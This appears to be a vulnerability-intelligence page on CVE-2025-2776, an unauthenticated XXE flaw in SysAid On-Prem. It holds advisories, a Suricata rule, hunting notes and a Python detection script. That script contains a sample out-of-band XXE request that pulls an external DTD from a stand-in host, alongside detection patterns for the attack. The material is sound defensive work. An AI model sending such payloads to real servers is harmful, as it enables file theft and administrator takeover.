CVE-2025-2776
Published 2025-05-07
Priority P1 (97) · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-08-12
Exploited in the wild
EPSS 72.97% (99.4th percentile)
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sysaid | sysaid | <= 23.3.40 | — |
| sysaid | sysaid_on-prem | <= 23.3.40 | — |
Detection & IOCs
bytes: |3c 21|ENTITY|20 25| ("<!ENTITY %", the opening of a parameter-entity declaration, the construct used to load an external DTD in out-of-band XXE)
snort/suricata:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)"; flow:established,to_server; http.uri; content:"/mdm/serverurl"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2776; classtype:web-application-attack; sid:2066206; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_12_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- Exploit traffic is an HTTP POST to the /mdm/serverurl endpoint on a SysAid On-Prem server; monitor that URI for XML entity declarations in the request body.
- Out-of-band XXE exploitation can be detected on the egress side via the SSRF callback: look for outbound HTTP requests with a Java User-Agent originating from the SysAid server, which indicates a triggered external entity fetch.
- The vulnerability is unauthenticated and resides in the Server URL processing functionality; no prior authentication is required to trigger the XXE, so any access to /mdm/serverurl from outside the expected MDM client population should be treated as suspicious.
- MITRE ATT&CK mapping: Initial Access via Exploit Public-Facing Application (T1190, TA0001); correlate SysAid exploitation attempts with subsequent lateral movement or credential access activity, since the primitive yields administrator account takeover.
- The ET rule (sid:2066206) requires TLS decryption to be effective against HTTPS-protected SysAid instances, as indicated by the TLSDecrypt deployment metadata. It uses Suricata sticky buffers (http.uri, http.request_body, http.method), so it loads on Suricata rather than Snort 2; it was created 2025-12-09, months after in-the-wild exploitation began, so sensors with older rulesets have no coverage. Note also that the rule's metadata tags cve CVE_2025_2777 while the reference keyword cites 2025-2776; key on the sid when correlating alerts.
- The Nuclei/interactsh-based detection relies on out-of-band callback infrastructure; it will only fire if the SysAid server can make outbound HTTP connections to the probe host. A server with egress filtering is still vulnerable even when the template reports nothing.
- Patched version is SysAid On-Prem 24.4.60; all instances on versions <= 23.3.40 remain vulnerable. Verify the installed version before assuming coverage.
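As an added example (not code from this page, from watchTowr, or from Emerging Threats), the following Python re-implements the match conditions of sid:2066206 over raw HTTP requests, adds the egress-side callback check described in the notes above, and gates on the affected version range. The request bodies, the proxy-log format, the hostnames and the IP addresses are constructed assumptions; the real /mdm/serverurl request format is not shown on this page, and the "reordered" sample exists only to show how the rule's distance:0 ordering behaves.

```python
"""Detection helpers for CVE-2025-2776 exploitation attempts (added example).

Re-implements the matching logic of ET sid:2066206 over raw HTTP requests
and adds an egress-side check for the out-of-band callback. All requests,
log lines and the proxy-log format below are constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    method: str
    uri: str
    body: bytes


def parse_raw_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request splitter (request line, headers, blank line, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    method, uri, _version = request_line.split(b" ", 2)
    return HttpRequest(method.decode("ascii"), uri.decode("ascii"), body)


# |3c 21|ENTITY|20 25| from the rule: "<!ENTITY %", a parameter-entity
# declaration, which is how an external DTD gets pulled in for OOB XXE.
ENTITY_DECL = b"<!ENTITY %"


def matches_serverurl_xxe(req: HttpRequest) -> bool:
    """Same three conditions as sid:2066206:
    http.method is POST; http.uri starts with /mdm/serverurl;
    http.request_body contains "<!ENTITY %" and, after it (distance:0), "SYSTEM".
    """
    if req.method != "POST":
        return False
    if not req.uri.startswith("/mdm/serverurl"):
        return False
    at = req.body.find(ENTITY_DECL)
    if at < 0:
        return False
    # distance:0 means SYSTEM must follow the end of the previous match
    return req.body.find(b"SYSTEM", at + len(ENTITY_DECL)) >= 0


# Hypothetical egress proxy log format (constructed): ts src method url status "user-agent"
PROXY_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\d{1,3}(?:\.\d{1,3}){3}) (?P<method>[A-Z]+) '
    r'(?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def suspicious_callbacks(log_lines, sysaid_hosts):
    """Outbound HTTP from a SysAid server whose User-Agent is the JVM default
    ("Java/..."), the fingerprint of a triggered external entity fetch."""
    hits = []
    for line in log_lines:
        m = PROXY_LINE.match(line)
        if m and m["src"] in sysaid_hosts and m["ua"].startswith("Java/"):
            hits.append((m["src"], m["url"]))
    return hits


def is_vulnerable_version(version: str) -> bool:
    """True for <= 23.3.40 (assumes plain dotted numeric version strings)."""
    return tuple(int(p) for p in version.split(".")) <= (23, 3, 40)


# --- constructed samples -----------------------------------------------------
EXPLOIT_REQUEST = (
    b"POST /mdm/serverurl HTTP/1.1\r\n"
    b"Host: sysaid.example.internal\r\n"
    b"Content-Type: application/xml\r\n\r\n"
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE x [ <!ENTITY % foo SYSTEM "http://oob.example.net/x.dtd"> %foo; ]>\n'
    b"<x/>\n"
)
BENIGN_REQUEST = (
    b"POST /mdm/serverurl HTTP/1.1\r\nHost: sysaid.example.internal\r\n\r\n"
    b"<serverurl>https://sysaid.example.internal</serverurl>\n"
)
GET_REQUEST = b"GET /mdm/serverurl?x=1 HTTP/1.1\r\nHost: sysaid.example.internal\r\n\r\n"
# SYSTEM appears only before the entity declaration: the rule's distance:0
# ordering does not match, and neither does this function.
REORDERED_REQUEST = (
    b"POST /mdm/serverurl HTTP/1.1\r\nHost: sysaid.example.internal\r\n\r\n"
    b'<!DOCTYPE x SYSTEM "x.dtd" [ <!ENTITY % foo "bar"> ]><x/>\n'
)
PROXY_LOG = [
    '2025-05-14T10:02:11Z 10.20.0.15 GET http://oob.example.net/x.dtd 200 "Java/11.0.20"',
    '2025-05-14T10:02:12Z 10.20.0.44 GET https://update.example.com/ 200 "Mozilla/5.0"',
    '2025-05-14T10:03:00Z 10.20.0.15 GET https://www.sysaid.com/ 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for name, raw in [("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST),
                      ("get", GET_REQUEST), ("reordered", REORDERED_REQUEST)]:
        print(f"{name:9s} -> {matches_serverurl_xxe(parse_raw_request(raw))}")
    print("callbacks:", suspicious_callbacks(PROXY_LOG, {"10.20.0.15"}))
    print("23.3.40 vulnerable:", is_vulnerable_version("23.3.40"),
          "| 24.4.60 vulnerable:", is_vulnerable_version("24.4.60"))
```

A Java User-Agent from the SysAid host is a hunt lead rather than a verdict, since the server's own integrations may use the JVM HTTP client; the strongest signal is an egress hit that follows an inbound match on the same host within seconds.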
CVSS provenance
nvd: v3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.3 CRITICAL
cisa: 9.8 CRITICAL
GHSA
GHSA-hvrh-gfrr-fgc9 · ghsa_unreviewed · 2025-05-07 · CVE-2025-2776 · CRITICAL · CWE-611
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
VulnCheck
SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability · vulncheck · 2025 · CVSS 9.3 · CRITICAL · CWE-611
SysAid On-Prem contains an improper restriction of XML external entity reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Affected: SysAid SysAid On-Premise
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-14&host_type=src&vulnerability=cve-2025-2776 ; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-15&host_type=src&vulnerability=cve-2025-277
CISA
SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability · cisa · 2025-07-22 · CVSS 9.8 · CRITICAL · CWE-611
Affected: SysAid SysAid On-Prem
SysAid On-Prem contains an improper restriction of XML external entity reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://documentation.sysaid.com/docs/24-40-60 ; https://nvd.nist.gov/vuln/detail/CVE-2025-2776
Remediation Due Date: 2025-08-12
Suricata
ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776) · suricata · 2025-12-09 · CVSS 9.3 · CRITICAL
Rule: sid:2066206, rev:1, reproduced in full under Detection & IOCs above.
Nuclei
SysAid On-Prem <= 23.3.40 - XML External Entity · nuclei · CVSS 9.8 · CRITICAL
Template (partial: the request section and the DTD declaration preceding %foo; did not survive extraction; only the tail of the payload and the matchers are shown):

```yaml
      %foo;
      ]>
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4b0a00483046022100921a4ba376602756f59f8ad19311a18d48f3b718e745a623423a7b3aa0749695022100a7e927b2bdc21b01be40e09bee4c1431128c800d0e47e12318cfcfabce60d196:922c64590222798bb761d5b6d8e72950
```
Bleepingcomputer
CISA warns of hackers exploiting SysAid vulnerabilities in attacks · blogs_bleepingcomputer · 2025-07-23 · CVSS 9.8 · covers CVE-2025-2775 and CVE-2025-2776
## CISA warns of hackers exploiting SysAid vulnerabilities in attacks
By Sergiu Gatlan
CISA has warned that attackers are actively exploiting two security vulnerabilities in the SysAid IT service management (ITSM) software to hijack administrator accounts.
The two unauthenticated XML External Entity (XXE) flaws, tracked as CVE-2025-2775 and CVE-2025-2776, were reported by watchTowr Labs security researchers in December 2024 and patched in March with the release of SysAid On-Prem version 24.4.60.
One month later, watchTowr Labs also published proof-of-concept code, showing that the SysAid vulnerabilities are trivial to exploit and allow attackers to retrieve local files containing sensitive information.
While CISA didn't share any additional details regarding these ongoing attacks, it
Timeline
2025-05-07: Published
2025-07-22: Added to CISA KEV
Exploited in the wild